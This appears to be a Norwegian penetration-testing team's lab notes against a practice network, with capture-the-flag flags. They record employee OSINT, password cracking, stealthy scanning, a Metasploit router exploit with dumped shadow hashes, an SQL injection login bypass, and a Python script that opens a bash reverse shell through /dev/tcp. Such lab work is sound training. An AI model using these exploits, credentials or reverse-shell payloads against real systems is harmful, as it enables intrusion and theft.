# ComFuzz --- ## Første ideer * Vi skal skaffe aksess slik at informasjon fra nettverket ikke havner i feil hender * Hva brukes maskinene til? * Innhente informasjon om befolkningen * Kan vi forhindre denne funksjonaliteten ved å få aksess? * Kan legge inn skadevare på maskinene slik at vi har bakdører og full kontroll over maskinene --- ## Plan * Sette målsetninger og definere grenser * Hvor mye støy er greit? * Jobbe etter Cyber Kill Chain-modellen? * Få initiell oversikt over nettverket * OSINT * Enumerering? * Finne inngangsvektorer --- ## OSINT * Hvilke spor legges igjen når vi gjør søk i åpne kilder? * IP, UserAgent, * Bør skjule IP adresse som f.eks benyttes til å besøke nettsider da denne trafikken vil logges (VPN/TOR) * Vi kan akseptere at noen spor legges igjen, men må ha i bakhodet hele tiden hvordan vi går frem * Fant passordhash og brukernavn en pull request i GITHub * Can crackes og gi initiell tilgang til nettverket * Kildekode til megacorpone.com ligger åpent på GitHub * Kan gjøre kildekodeanalyse og se etter sårbarheter * Sikkerhetsprodukt er starred i Git * https://github.com/alienfault/ossim * Kan indikere at de benytter dette som intern sikkerhetsløsning * Laget fake Facebook-konto for å undersøke kontoene vi fant * Siden ikke tilgjengelig * Finner ikke konto ved søk --- ## Enumerering * Har flere IPer og domener, utføre scanning mot disse? * Hvor mye støy genererer dette? Finnes det bedre alternativer? * Ping-scanning git relativt lite støy * Utføre scanning fra utsiden av nettverket eller forsøke initiell aksess før vi scanner? ## Initiell aksess * Hva må passes på? * Honeypots, deteksjonskapabiliteter * Begynne med å cracke passordhash * Finner ikke riktig mode * Løste seg (mode 1600 i hashcat) * Har en liste med brukernavn, kan password spraye mot disse * Støyete, bør kanskje unngås Ressurser: * https://github.com/megacorpone/ * https://www.facebook.com/MegaCorp-One-393570024393695/ * https://twitter.com/joe_sheer/ * https://www.linkedin.com/company/megacorp-one * https://www.megacorpone.com/ * 149.56.244.87 * https://github.com/megacorpone/megacorpone.com/blob/master/megacorpone/xampp.users Of interest: `support.megacorpone.com` Er nede; ```support.megacorpone.com. 56 IN A 51.222.169.218``` Intranet: ```intranet.megacorpone.com. 274 IN A 51.222.169.211``` mecacorpone registar: ``` Registry Registrant ID: Registrant Name: Alan Grofield Registrant Organization: MegaCorpOne Registrant Street: 2 Old Mill St Registrant City: Rachel Registrant State/Province: Nevada Registrant Postal Code: 89001 Registrant Country: US Registrant Phone: +1.9038836342 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 3310f82fb4a8f79ee9a6bfe8d672d87e-1696395@contact.gandi.net ... DNSSEC: Unsigned ``` HQ på kart: \https://www.google.com/maps/place/37%C2%B038'45.6%22N+115%C2%B044'49.5%22W/@37.646001,-115.7476837,514m/data=!3m2!1e3!4b1!4m6!3m5!1s0x0:0xbcec76de1541ea52!7e2!8m2!3d37.646001!4d-115.7470871!5m1!1e) Personer / Kontoer | Person | Rolle | Kontoer | Epost / Brukernavn? | | ------------- | ------------------------ | ----------------------------------------------------------- | ------------------------- | | Joe Sheer | CEO | [Twitter:@Joe_Sheer](https://nitter.it/joe_sheer/) | joe@megacorpone.com | | Tom Hudson | Designer | [Twitter:@TomHudsonMCO](https://nitter.it/TomHudsonMCO) | thudson@megacorpone.com | | Tanya Rivera | Senior Developer | [Twitter:@TanyaRiveraMCO](https://nitter.it/TanyaRiveraMCO) | trivera@megacorpone.com | | Matt Smith | Marketing director | [Twitter:@MattSmithMCO](https://nitter.it/MattSmithMCO) | msmith@megacorpone.com | | Mike Carlow | VP Legal | | mcarlow@megacorpone.com | | Alan Grofield | IT and Security Director | | agrofield@megacorpone.com | | HR | | | hr@megacorpone.com | | Sales | Sales | | sales@megacorpone.com | | Shipping | | | shipping@megacorpone.com | Finnes ikke * https://www.megacorpone.com/.well-known/security.txt * http://megacorpone.com/sitemap.xml Robots.txt: ``` User-agent: * Allow: / Allow: /nanites.php ``` nanites.php insinuere at vi er i Rachel, NV, USA Nanites - microrobotics: https://en.wikipedia.org/wiki/Nanorobotics Funn av XAMPP bruker og hash i Github: * https://github.com/megacorpone/megacorpone.com/pull/1/commits/fe1f303e85c9ccdaef53b5eef8ff1d25d46c5389 * `trivera:$apr1$A0vSKwao$GV3sgGAj53j.c3GkS4oUC0` HashID sier dette er en MD5(APR) eller Apache MD5 hash Crackes via `hashcat -a 0 -m 1600 hash.txt rockyou.txt` => Tanya4life (raskere å cracke i motsatt retning, `tac rockyou.txt > yockrou.txt`) ## System info Fra stillingsutlysningside: - Bruker Citrix for remote access - Firepass firewall ## Foreløpig status * Har passord og brukernavn til en konto * Har en liste over navn og eposter til ansatte * Citrix brukes for remote access, Firepass firewall, OS-Sim nettverksmonitorering? * Har offentlige IPer og kjenner til flere subdomener intranet.megacorpone.com og support.megacorpone.com * intranet.megacorpone.com: 51.222.169.211 * support.megacorpone.com: 51.222.169.218 * www.megacorpone.com: 149.56.244.87 * mail2.megacorpone.com: 51.222.169.213 * mail.megacorpone.com: 51.222.169.212 * vpn.megacorpone.com: 51.222.169.220 ## Videre aktivitet * Scanne IPer eller domener * Kjenner en rekke IPer, men ikke tjenestene som finnes på dem * Interessante porter for workstations: * 53 - DNS * 88 - Kerberos * 135 - RPC * 445 - SMB * Bruke jump host til å logge inn på brukerkonto? * Bruke infrastruktur i et land vi vet Utlandia ikke har samarbeid med slik at informasjon ikke blir utlevert * Lytter etter trafikk som broadcastes til alle enheter på VPN med Wireshark * Firepass brukte følgende porter i 2018: * https://support.f5.com/csp/article/K3558 * Liste over Citrix porter: * https://docs.citrix.com/en-us/tech-zone/build/tech-papers/citrix-communication-ports.html * Undersøke web-tjeneste? * Mulige problemer: * Skiller trafikken seg ut? * User agent, IP * Sjekke port 80 - naturlig med mye trafikk hit, skiller seg ikke ut. * Sørge for at SRC er en maskin som ikke skiller seg ut - Windows maskin fra intern IP * Enumerere SMB shares i nettverket? Antakeligvis åpen på mange hosts og vi har credentials til en bruker * Scanne etter åpne port 139 på kandidater ## OPSEC * Bruke eksisterende pakker som ligner for ikke bli tatt * Ringe tlf via vpn med online offentlig VoIPtjeneste * * Ping scanne alle hoster internt på nettverket * Ikke veldig uvanlig at scanning gjøres, men suspekt at det kommer fra intern IP, kan bli detektert * Hvordan scanne med mest mulig OPSEC-hensyn? * Bruke bare windows til a utforske windowsgreier | IP | CP Navn | Info/Pakke | | ------------- | ------- | ----------------------------------------------------- | | 172.16.10.20 | | Host Ann. PDC | | 172.16.10.22 | | Host Ann. BARYONIC | | 172.16.10.26 | | Host Ann. WS02 | | 172.16.10.27 | | Host Ann. WS03 | | 172.16.10.28 | | Host Ann. WS04 | | 172.16.10.29 | | Host Ann. WS05 | | 172.16.10.30 | | Host Ann. ABUTMENT | | 172.16.10.31 | | Host Ann. MUON | | 172.16.10.32 | | Host Ann. ORBITON | | 172.16.10.55 | | Local Master Ann. LT01, Domain/Workgroup Ann. MC0 | | 172.16.10.66 | BORON | SSDP Platinum UPnP | | 172.16.10.80 | | Host Ann. PROXIMA | | 172.16.10.85 | | Host Ann. CHROMIUM | | 172.16.10.114 | | Host Ann. THUNDARA | | 172.16.10.116 | | Host Ann. Local Master | | 172.16.10.125 | OZONE | Host Ann. WEB | | 172.16.10.127 | | Host Ann. DC02 | | 172.16.10.128 | | Host Ann. DC01 | | 172.16.10.130 | | Host Ann. CLIENT01 | | 172.16.10.140 | | MDNS, LLMNR | | 172.16.10.141 | | Host Ann. LEGOLAS | | 172.16.10.142 | | Host Ann. HAWKEYE | | 172.16.10.144 | | Host Ann. HOOD - other protocols: SSDP, SMB MAILSLOT, | | 172.16.10.162 | | Host Ann. LT02 | | 172.16.10.168 | | Host Ann. ARCDC | | 172.16.10.169 | | Host Ann. ARCCA | | 172.16.10.185 | | Host Ann. PERUSAL | | 172.16.10.221 | | Host ann. CORAX - other protocols: NBNS, MDNS, LLMNR | 172.16.10.114, 116, og 117 er ikke relevante da disse er fra ThunderCorp! # Task Backlog - [ ] Set up citrix env locally for test - [ x ] Find kjente citrix exploits - Masse muligheter mtp kjente CVE'er - [ x ] Find kjente firepass exploits - Ingen CVE siden 2013. - [ ] Lær mer i dybde om AD - [ ] Learn how mDNS works - Spoofing? - [ ] Scanne kjente IPer og enumerere tjenester - [ ] Understand M-SEARCH in SSDP - [ ] Also Platinum UPnP is very related? ## Funn oppdaert * Funnet en rekke hosts internt på nettverket * Windows host discovery * 224.0.0.251 mDNS * UPnP/1.0 DLNADOC/1.50 Platinum/1.0.5.13 - Broadcast as SSDP from .10.66 * Firefox for Android prior to version 79 did not properly validate the schema of the URL received in SSDP [Fra wikipedia](https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol) ## 172.16.10.125 Port 80 * Welcome To Prominent Studios * Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.2 * Ingen åpenbare sårbarheter som kan utnyttes, relativt ny * Ingen input-felter eller annet som kan utnyttes direkte * finner ingen subdomener eller foldere på serveren * Må aktivt scannes for å finne veier til aksess via web serveren ## Må begynne med mer aggresiv strategi * Scanne Webside * Scanne SMB Shares * https://superuser.com/questions/1492010/finding-all-samba-shares-in-local-network * Annen scanning mot AD * UPnP * Bruke windows til a mappe SMB shares * Finne alternativ for verktoy, bruke minst noisy ## Ops: SAMBA1 / PLEX * Har creds * Logge pa .10.66 med creds? 10.66 var veldig verbos i broadcast * Nichlas prover * Hvorfor: Utforske mulige ingangsvektorer ved a hente informasjon fra SAMBA pa maskin * Ingen RDP * Hvilke spor legger vi igjen? * Logger over IP, User agent, Host, Kommandoer * Benytter smbclient for å enumerere * Anonymous . . . ### Res: * PLEX * Får listet data med Anonymous som brukernavn * Creds for trivera fungerer for innlogging * Lister shares - print$ - VIDZ - IPC$ (computadora server) * VIDZ/Application Support` * /Logs * Ligger mange DLNA log-filer. Indikerer at DLNA er skrudd på. Kan se nærmere på port 1900  Plex Media Server - Vektor?  * Får enumerert VIDZ som trivera * Får også enumerert VIDZ som anonymous Hva er COMPUTADORA workgroup * Workgroups: MCO og WORKGROUP Config-fil: ```<MediaContainer SETTINGS_SEE_TABLE_BELOW> <Directory count="1" key="activities" title="activities"/> <Directory count="1" key="butler" title="butler"/> <Directory count="1" key="channels" title="channels"/> <Directory count="1" key="clients" title="clients"/> <Directory count="1" key="diagnostics" title="diagnostics"/> <Directory count="1" key="hubs" title="hubs"/> <Directory count="1" key="library" title="library"/> <Directory count="3" key="livetv" title="livetv"/> <Directory count="3" key="media" title="media"/> <Directory count="1" key="neighborhood" title="neighborhood"/> <Directory count="1" key="playQueues" title="playQueues"/> <Directory count="1" key="player" title="player"/> <Directory count="1" key="playlists" title="playlists"/> <Directory count="1" key="resources" title="resources"/> <Directory count="1" key="search" title="search"/> <Directory count="1" key="server" title="server"/> <Directory count="1" key="servers" title="servers"/> <Directory count="1" key="statistics" title="statistics"/> <Directory count="1" key="system" title="system"/> <Directory count="1" key="transcode" title="transcode"/> <Directory count="1" key="updater" title="updater"/> </MediaContainer> ``` | Setting | Value | | ----------------------------- | ------------------------------------------------------------------ | | AllowMediaDeletion | "1" | | allowSharing | "1" | | allowSync | "0" | | allowTuners | "1" | | backgroundProcessing | "1" | | companionProxy | "1" | | diagnostics | "logs,databases,streaminglogs" | | eventStream | "1" | | friendlyName | "computadora" | | hubSearch | "1" | | itemClusters | "1" | | livetv | "6" | | machineIdentifier | "fec06f941bc57d1f123449afdb7dddd8560d5330" | | mediaProviders | "1" | | multiuser | "1" | | myPlex | "1" | | myPlexMappingState | "unknown" | | myPlexSigninState | "none" | | myPlexSubscription | "0" | | photoAutoTag | "1" | | platform | "Linux" | | platformVersion | "4.4.0-116-generic (#140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018)" | | pluginHost | "1" | | readOnlyLibraries | "0" | | requestParametersInCookie | "1" | | streamingBrainVersion | "2" | | sync | "1" | | transcoderActiveVideoSessions | "0" | | transcoderAudio | "1" | | transcoderLyrics | "1" | | transcoderPhoto | "1" | | transcoderSubtitles | "1" | | transcoderVideo | "1" | | transcoderVideoBitrates | "64,96,208,320,720,1500,2000,3000,4000,8000,10000,12000,20000" | | transcoderVideoQualities | "0,1,2,3,4,5,6,7,8,9,10,11,12" | | transcoderVideoResolutions | "128,128,160,240,320,480,768,720,720,1080,1080,1080,1080" | | updatedAt | "1613402705" | | updater | "1" | | version | "1.13.0.5023-31d3c0c65" | ## Next steps: - Vuln i Plex? - Finne versjon? - OS? Warning about insecure ports:  [Plex runs on](https://support.plex.tv/articles/201543147-what-network-ports-do-i-need-to-allow-through-my-firewall/) TCP:32400 Other related ports: - UDP:1900 DLNA - UDP:5353 Old Bonjour/Avahi discovery - TCP:8324 Control Plex for Roku via Plex Companion - UDP: 32410, 32412, 32413, 32414 (current GDM network discovery) ## OPS: Plex UI - Use webserver on flex. Natural usage. - Går inn på 172.16.10.66:32400 - Redirected til index.html ved første request - Fant en config-fil ved å sende request direkte til http://172.16.10.66:32400/ - Avslørte at OS er Ubuntu - JS code beautified: http://dpaste.com//258JTEA5F ## OPS: SSH1 - Siden OS var Linux sjekket vi om SSH var oppe - det var den - trivera med Tanya4life funket ikke som creds # TIRSDAG ## Prep: - Installer Plex lokalt med tilsvarende config, se hva som skjer - Lastet ned korrekt versjon fra plex.tv: [1.13.0.5023-31d3c0c65](https://downloads.plex.tv/plex-media-server/1.13.0.5023-31d3c0c65/plexmediaserver_1.13.0.5023-31d3c0c65_amd64.deb) - Config pa lokal version er identisk med den som er pa server. Default installasjon? - CVE-2018-13415 Exploit 1.13.2. - Kjerne 4.4.0-116-generic pa Ubuntu er veldig gammel. Dirty COW - Dirty Cow ustabil. PrivEsc med https://www.exploit-db.com/ [(arkiv)](https://web.archive.org/web/20220519144849/https://www.exploit-db.com/exploits/44298) ## CVE 2018-13415 * Usikker på om den fungerer på Linux domains * RCE delen står spesifisert at den fungerer i windows domains * Kan hende at vi kan få tilgang til filsystemet * Kan dette gi oss noe viktig informasjon? * Muligens noe informasjon som kan gi ytterliggere tilgang, creds, logger ## Ingen action Gar ikke videre med a angripe Plex - ser ikke nok utbytte. ## OPS: ARP Scan | IP | MAC | Provider | | ------------- | ----------------- | ------------------ | | 172.16.10.1 | 58:9c:fc:00:45:3b | FreeBSD Foundation | | 172.16.10.10 | 00:50:56:92:f1:dd | VMware, Inc. | | 172.16.10.11 | 00:50:56:92:1e:58 | VMware, Inc. | | 172.16.10.20 | 00:50:56:92:e6:8c | VMware, Inc. | | 172.16.10.22 | 00:50:56:92:91:44 | VMware, Inc. | | 172.16.10.25 | 00:50:56:92:01:45 | VMware, Inc. | | 172.16.10.26 | 00:50:56:92:9c:67 | VMware, Inc. | | 172.16.10.27 | 00:50:56:92:9e:55 | VMware, Inc. | | 172.16.10.28 | 00:50:56:92:da:0c | VMware, Inc. | | 172.16.10.29 | 00:50:56:92:ba:81 | VMware, Inc. | | 172.16.10.30 | 00:50:56:92:3c:b7 | VMware, Inc. | | 172.16.10.31 | 00:50:56:92:44:67 | VMware, Inc. | | 172.16.10.32 | 00:50:56:92:39:e5 | VMware, Inc. | | 172.16.10.35 | 00:50:56:92:eb:a7 | VMware, Inc. | | 172.16.10.44 | 00:50:56:92:a9:fd | VMware, Inc. | | 172.16.10.46 | 00:50:56:92:4a:db | VMware, Inc. | | 172.16.10.55 | 00:50:56:92:0d:d6 | VMware, Inc. | | 172.16.10.61 | 00:50:56:92:0a:91 | VMware, Inc. | | 172.16.10.66 | 00:50:56:92:0f:a7 | VMware, Inc. | | 172.16.10.75 | 00:50:56:92:9d:d6 | VMware, Inc. | | 172.16.10.76 | 00:50:56:92:fb:af | VMware, Inc. | | 172.16.10.77 | 00:50:56:92:06:23 | VMware, Inc. | | 172.16.10.80 | 00:50:56:92:6f:92 | VMware, Inc. | | 172.16.10.85 | 00:50:56:92:19:b0 | VMware, Inc. | | 172.16.10.114 | 00:50:56:92:3f:63 | VMware, Inc. | | 172.16.10.116 | 00:50:56:92:18:9b | VMware, Inc. | | 172.16.10.117 | 00:50:56:92:db:11 | VMware, Inc. | | 172.16.10.125 | 00:50:56:92:87:27 | VMware, Inc. | | 172.16.10.126 | 00:50:56:92:fe:84 | VMware, Inc. | | 172.16.10.127 | 00:50:56:92:68:17 | VMware, Inc. | | 172.16.10.128 | 00:50:56:92:e6:a0 | VMware, Inc. | | 172.16.10.130 | 00:50:56:92:b1:81 | VMware, Inc. | | 172.16.10.131 | 00:50:56:92:5b:b1 | VMware, Inc. | | 172.16.10.140 | 00:50:56:92:3f:d2 | VMware, Inc. | | 172.16.10.141 | 00:50:56:92:8b:44 | VMware, Inc. | | 172.16.10.142 | 00:50:56:92:9b:17 | VMware, Inc. | | 172.16.10.143 | 00:50:56:92:30:c3 | VMware, Inc. | | 172.16.10.144 | 00:50:56:92:fe:5e | VMware, Inc. | | 172.16.10.145 | 00:50:56:92:13:f9 | VMware, Inc. | | 172.16.10.162 | 00:50:56:92:d7:27 | VMware, Inc. | | 172.16.10.167 | 00:50:56:92:d3:15 | VMware, Inc. | | 172.16.10.168 | 00:50:56:92:db:b3 | VMware, Inc. | | 172.16.10.169 | 00:50:56:92:4d:10 | VMware, Inc. | | 172.16.10.185 | 00:50:56:92:c1:28 | VMware, Inc. | | 172.16.10.186 | 00:50:56:92:90:11 | VMware, Inc. | | 172.16.10.187 | 00:50:56:92:ab:cc | VMware, Inc. | | 172.16.10.200 | 00:50:56:92:97:32 | VMware, Inc. | | 172.16.10.201 | 00:50:56:92:6b:ec | VMware, Inc. | | 172.16.10.221 | 00:50:56:92:51:da | VMware, Inc. | ## OPS: WebSearch To alternativer: **Alt 1: NMAP Stealth** https://nmap.org/book/nmap-defenses-detection.html Etter ARP-scan vil vi finner servere med typiske porter. Portkandiater Http(s): 80, 443. 443 impliserer ofte at 80 er apen. Ønsker å finne citrix server. Noisy? CitrixXen kjorer på https. Har de Xen mon tro? 22: Alarm? 3390: Er det mye trafikk? Kan god uttelling Velger å bare scanne port 80 i foeaurste omgang. User Agent: `UPnP/1.0 DLNADOC/1.50 Platinum/1.0.5.13` Kommandoer: `nmap -T0 -Pn -p 80 -oG logfile.gnmap 172.16.10.0/24` Kommandoer: `nmap -T0 -Pn -p 22,3390 -oG logfile.gnmap 172.16.10.0/24` Ønsker å være så stealthy som mulig If stealth is your goal: * Avoid obvious tools (like SQLMap) or ensure they have settings to hide things like a User-Agent string. (e.g., sqlmap --user-agent=Benign/1.0) * Go slowly and as targeted as possible. Know your target before you try to hit it. Surgical precision is better than brute force if you need ot be quiet. * Ønsker å spre scanningen utover en lengre tidsperiode for å ikke bli detektert * Bruker -T 0 som option **Alt 2: Bruke browsere direkte.** Mye manuelt arbeid. Legger trolig igjen mer overhead/metadata. **Go Nmap** ## Resultat Folgende ip-er har port 80 apen: | IP-addr | Innhold | | ------------- | ------------------------------------------------- | | 172.16.10.10 | Gitlab | | 172.16.10.11 | Redirects to /login and then Connection failed? | | 172.16.10.27 | Apache login xampp. Trivera login here! | | 172.16.10.35 | Qube gaming | | 172.16.10.44 | Web2Project login page Version 3.3.66 | | 172.16.10.46 | File sharing / Pontem | | 172.16.10.61 | Blank | | 172.16.10.75 | 503 service unavailable Microsoft-HTTPAPI/2.0 | | 172.16.10.77 | OwnCloud webservices | | 172.16.10.125 | Prominent studios | | 172.16.10.141 | Windows server IIS | | 172.16.10.145 | Welcome to NginX | | 172.16.10.167 | Arcweb services | | 172.16.10.169 | Windows server IIS | | 172.16.10.200 | Netgear access point | ## OPS: Trivial Trivera Loging in with credentials we found on the HTTP basic AUTH ## Result Login successful ## XAMPP 172.16.10.27 - Versjon 1.7.2 * XAMPP is a completely free, easy to install Apache distribution containing MariaDB, PHP, and Perl. * Needs client to log in to managing * Server versions: * Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_perl/2.0.4 Perl/v5.10.0 * Found in page not found http://172.16.10.27/xampp/status.phpp  Exploits: * https://www.exploit-db.com/exploits/10391 - Set root password ## OPS: Trivera Gitlab Reuse Check if Trivera reuse password on gitlab. ## Result: She does not :( ## OPS: Netgear logins Hvorfor: Innhente mye info om nettvek, og fa tilgang til a styre hele nettverksflyt pa tilkoblede enheter. Kan hente trafikklogger etc. ## Resultat Bruker: admin Passord: password Veldig veldig treg.. *TREG* **slow** Vi kjøpte samme ruter med samme firmware i et identisk nettverksoppsett og prøvde å få shell på denne. Det fikk vi via metasploit: ``` $ msfconsole > use exploit/linux/http/netgear_unauth_exec > set LHOST 172.16.10.248 > set RHOSTS 172.16.10.200 > set SRVHOST 172.16.10.248 > exploit [...] [*] Server stopped. whoami root ``` i `/root/proof.txt` ligger flagget: - access{fbf4f621991c2e0f5911cc8d8c0d8ee3} shadow: ``` cat /etc/shadow root:$1$z7ix/gfG$/bjrBR2LZEK3UK6WpLjCl/:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: adm:*:10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody:*:10933:0:99999:7::: admin:$1$.6IhIu7J$xn/wkxJHyXv.puP/2Srbx/:10933:0:99999:7::: ``` ## OPS: FTP Hvorfor: * FTP er ikke aktivert by default * Ofte mulig å logge inn uten creds * Hvis ikke kan vi prøve trivera sine * Kan finne interessante filer på serveren Hvordan: * forsøke å logge inn som anonymous * Hvis dette ikke fungerer forsøke å logge inn som trivera * Deretter lete forsiktig rundt i filsystemet for å se hva vi finner Resultat: * Klarte å logge inn som anonymous * Fant en git-mappe * Inneholdt akkurat samme innhold som Github * Fant ingen informasjon som var verdt å eksfilterere * Innebærer en risk, og sjansen for at vi finner noe interessant er liten * Version 0. Resultat ved login som trivera:   * Ingen ytterliggere tilgang ## XAMPP flere muligheter * https://packetstormsecurity.com/files/83547/XAMPP-1.7.2-Administrative-Bypass.html * Versjonen er sårbar for en admin bypass * Kan besøke http://172.16.10.27/security/xamppsecurity.php og endre passordet * Må finne ut hva passordet kan brukes til * Passord er trolig lagret i * (File: C:\xampp\security\mysqlrootpasswd.txt) * (File: C:\xampp\security\xamppdirpasswd.txt) * Kan vi bruke FileZilla+vuln til a hente passwdfiler? * Logge inn som trivera? * Fikk opp usage statistics ut av det blå * Klarer ikke å gjenskape denne siden      * Filezilla er gammel versjon og sårbar for https://github.com/NeoTheCapt/FilezillaExploit/blob/master/FuckFilezilla_0_9_41.php * Ulempe: lager bruker og legger igjen en del spor * Utfordring å finne en måte å laste opp og akessere fil ## Perl * Perl er installert på serveren og er versjon 5.10.0 * Sårbar for CVE-2012-6329, men virker ikke som vi kan exploite den ## OPS: MySQL trivera reuse Hvorfor: Finne informasjon som f.eks. passord til videre tilgang, innflytelse pa websystemer. Finne info for lateral bevegelse i nettverk. ## OPS: XAMPP Hvorfor: for å få shell på en maskin Funn av http://172.16.10.27/megacorpone/ hvor filene fra FTP serveren til XAMPP kjører. Prøv å få reverse shell via opplastet PHP fil. ## OPS: GoAdmin * Port 80 er åpen, kommer her til en login page * Admin page er sårbar for SQL injection * https://vuldb.com/?id.75240 * Logger inn som admin:`' or '1'='1'-- ` * Fikk tilgang til Dashboard * Creds til admin-profilen: * admin:ruAWYPLCPcK3dZ3P  * Følgende services kjører på serveren:  * Under https://172.16.10.11/scripts kan man legge til scripts * Kan brukes til å få shell? * Liste over sårbarheter i GoAdmin 3.3 * https://vulmon.com/searchpage?q=goadmin+ce * https://vulmon.com/vulnerabilitydetails?qid=CVE-2015-2844&scoretype=cvssv3 * 172.16.10.11/index.php/go_site/cpanel/{payload} * skal kunne gi shell * Alternativt https://vulmon.com/vulnerabilitydetails?qid=CVE-2015-2842&scoretype=cvssv3 * File upload som gir RCE Audiostore: https://github.com/goautodial/ce-v3-www/search?q=audiostore CVE-2015-2844 og CVE-2015-2845 gir RCE med URL. Skreiv pythonscript: ```python import requests from base64 import b64decode, b64encode import netifaces as ni ip = ni.ifaddresses('tap0')[ni.AF_INET][0]['addr'] lhost = ip rhost = "https://172.16.10.11" shellport = 4445 proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", } s = requests.session() r = s.post(rhost+"/index.php/go_login/validate_credentials", data={ "user_name":"admin", "user_pass":"' or '" },proxies=proxies, verify=False) r.content cmd = b64encode(f"bash -i >& /dev/tcp/{lhost}/{shellport} 0>&1".encode()).decode() payload_url = rhost+f"/index.php/go_site/cpanel/|echo -n {cmd} | base64 --decode| bash &" r = s.get(payload_url, proxies=proxies, verify=False) ``` i ~/hash.txt: flumen{5c9b271cf330bb05e632da0ffa7f7015} ## OPS:172...61 Kjore nmap fra ruter. Fant phpsys (port 2000) med nmap -F Returnerer blank nettside Server Apache/2.4.18 (Ubuntu) Check path traversal vuln - nope ZeroDay i [languages](https://cxsecurity.com/issue/WLB-2016020013) # Onsdag ## Planer videre * Vurderer å bruke kompromiterte maskiner som jumphosts * C2? * Ønsker å ta over domenekontrolleren, men vil også komrpmittere flest mulig maskiner * Kvalitet vs kvantitet på aksessen * Jobber parallellt med XAMPP og undersøkelser på domenekontroller ## PLAN: XAMPP Headers: Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 mod_perl/2.0.4 Perl/v5.10.0 PhPMyAdmin : Vet ikke version Bruker PHP 5.3.0 fra 2009. PHPMyAdmin version bor da vaere rundt omkring 3.2.9 [phpmyadmin release list](https://www.phpmyadmin.net/files/) [apachefriends](https://www.apachefriends.org/blog/news-article-146986.html) antyder at XAMPP version 1.7.2 sendes sammen med PHPMyAdmin 3.2.0.1. Mulige CVE-er: [2011-2506 2011-2505](https://www.exploit-db.com/exploits/17514) Demo script. ## Undersøkelser av domenekontroller * Vet at 172.16.10.127 er domenekontroller basert på hostname som vi fant under passiv scanning * Første mål: Finne hvilke porter som skal scannes * 53: DNS * 88: Kerberos * 135: RPC * 139: NetBios * 445: SMB * Mulige angrep: * Kerberoasting * AsRepRoasting * Pass the hash/Pass the ticket * Kan undersøke om trivera gjenbruker passordet og gir aksess til SMB shares eller noe annet * Kan bli vannskelig å angripe domenekontroller direkte, bedre løsning å angripe den via en annen domeneijoinet maskin ## OPS: Finne åpne porter på domenekontroller * Kjører nmap med følgende kommando: * sudo nmap -sS 172.16.10.127 -T0 -v -p 53,88,135,445 * -sS er steath scan, få porter som ikke burde vekke mistanke * -T0 gir mye tid mellom requests for å ikke vekke mistanke * Resultat:  * Alle porter som ble scannet er åpne ## Veiledning Onsdag Ny info - flere nettverk del av scope. Tilbake til lytting og kartlegging - Ikke gå rett på domenekontroller, gå via en maskin som er på domenet - Alt i proving grounds er innafor, mulig man må - Gjøre OSINT på de andre bedriftene? Kanskje det finnes delte brukere eller andre lettere mål - Scan etter Windows porter på de andre maskinene? 3389? 445? ## Undersøkelse av Workstations * Ønsker å finne en vei videre til domenekontroller * Workstations ble oppdaget under passiv scanning * Sannsynlig at de kan gi en vei videre til DC * Må finne åpne porter for å undersøke muligheter for aksess * Nmap * Mulige interessante porter: * 135,445, 139, ## ProtoStar Scanning | IP | Åpne Porter | Info/Pakke | | -------- | -------- | -------- | | 172.16.11.18 | 445,3389 | RDP | | 172.16.11.19 | 80 | FusionPBX | | 172.16.11.20 | 21,25,135,139,445,3389,4130,8808 | | | 172.16.11.30 | 135,445 | | | 172.16.11.36 | 80,135,445 | IIS | | 172.16.11.40 | 80 | Gitlab | | 172.16.11.43 | 135,445,3389 | | | 172.16.11.44 | 135,445,3389 | | | 172.16.11.77 | 80 | Project Jade | | 172.16.11.171 | 80 | AlienVault OSSIM | | 172.16.11.182 | 80,445 | KodExplorer | ## 172.16.11.20 * Mange porter åpne, gir mange mulige inngangsvektorer * FTP, Samba shares, RDP * ## Slides: https://hackmd.io/slide-example?both https://hackmd.io/s/SyZdTi1ri ## Ops 11.20 (dione) poker ### Plan: Probe porter se headers. Lete etter relevante sårbarheter til disse. Prove RDP guest bruker ### Exec #### SMTP: Kjort `nc 172.16.11.20 25` `220 WIN-UBGTCRFMMK6 Microsoft ESMTP MAIL Service, Version: 10.0.14393.0 ready at Wed, 2 Nov 2022 04:24:46 -0700 ` https://www.darknet.org.uk/2008/03/hacking-windows-nt-through-iis-ftp/ Prøve å sende følgende kommando? * AUTH NTLM 334 * Hvis svar er "NTLM supported": * Send strengen TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= * Trigger challenge response fra serveren og avslører mye info om systemet * https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de1767566* 6 * Utført, men NTLM autentisering er ikke tillatt på siden * "504 5.7.4 Unrecognized authentication type " * Forsøkt å enumerere brukere med: * VRFY root * 252 2.1.5 Cannot VRFY user, * EXPN root * 500 5.3.3 Unrecognized command * Ingen info blir avslørt #### FTP: Microsoft FTP Service Får logget inn som Anonymous og har skrivetilgang ### RDP: ### Samba shares: ## Analysis dione 1 ### Er dette IIS versjon? :`10.0.14393.0` XSS vulnerability ## OPS SOLR: Solr web interface pa http://172.16.11.20:4130/. Versjon er 8.2.0. **Metasploit tilgjengelig:** ``exploit(multi/http/solr_velocity_rce)`` ### Exploit: Utnytter noe URL-greier [CVE-2019-17558](https://nvd.nist.gov/vuln/detail/CVE-2019-17558). ### Plan: - Finne flaggfil "grep" i fil - host - Hente hash i SAM - Lete etter andre aksesspunkter - List ut C:\Users - Get-ADDomain -Current LoggedOnUser - Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem | Select Name, Domain - NET USER (Lage ny bruker?) ### Exec: Siden hang seg opp - starter den pa nytt. Success!   Flagg: * dione{23b29520567c50a3ca481cd607b4eeb3}  Versjon: * 